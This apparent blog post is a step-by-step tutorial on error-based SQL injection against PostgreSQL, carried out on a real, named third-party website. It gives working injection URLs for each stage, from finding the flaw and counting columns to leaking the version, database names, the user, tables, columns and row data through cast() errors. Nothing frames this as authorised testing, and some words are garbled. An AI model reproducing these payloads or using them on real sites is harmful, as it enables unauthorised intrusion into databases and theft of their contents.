Thursday, May 26, 2016

Manual sql injection tutorial: Postgre Error based !!!














































Postgre:




































Traditional relational database management systems (DBMSs) support a data model consisting of a collection of named relations, containing attributes of a specific type. In current commercial systems, possible types include floating point s, integers, character strings,
money, and dates.
Lets start to play with Postgre:
we have a sql error based vulnerable website:1st Step find the vulnerability:
:http://www.crtop.com.cn/index.cfm?MenuID=80'
ERROR: syntax error at or nr "''"
its mn this website can be injected.remember errors can varies you wont get the same error every time.2nd Step Columns count:
:http://www.crtop.com.cn/index.cfm?MenuID=80 order by 1--
get valid page:http://www.crtop.com.cn/index.cfm?MenuID=80 order by 2--
Error Executing Database Query.
ERROR: ORDER BY position 2 is not in select list
That Error shows that there is one column.Lets try UNION SELECT query:
:http://www.crtop.com.cn/index.cfm?MenuID=80 and 1=2 UNION SELECT 1--
Error Executing Database Query.
ERROR: UNION types character varying and integer cannot be matched

Seems like UNION SELECT query is not working !!!


Lets try Errorbased Postgre SQLi…

3rd Step::http://www.crtop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)--

ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.rl (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"

As we can see we got version of postgre DB server in the form of error.Lets move on and find database name.
:http://www.crtop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)--
Error Executing Database Query.

ERROR: invalid input syntax for integer: "scoutsqld"
Scoutsqld is 1st database name you can variey offset to get other databases names.

scoutsqld is first database we can get others by changing offset :):http://www.crtop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "template0"
template0 is 2nd database so you can incrse offset till you got error.Lets find out the user:
:http://www.crtop.com.cn/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "postgres"

postgres is the user :)Lets find the tables :>
4th step:
:http://www.crtop.com.cn/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tableslimit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "pg_type"

pg_type is first table we can get others by changing offset :)5th step:

Now we have to find the columns from our specific table !!!

e.g

our table is action

for that we have to use char conversion.Pg_type= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)

so our query is ::http://www.crtop.com.cn/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)limit 1 offset 0) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: " typname "
And further you can find the columns using offset..Last step:
Now we have to extract data from our column .
:http://www.crtop.com.cn/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)--
Error Executing Database Query.
ERROR: invalid input syntax for integer: "bool"

No comments:

Post a Comment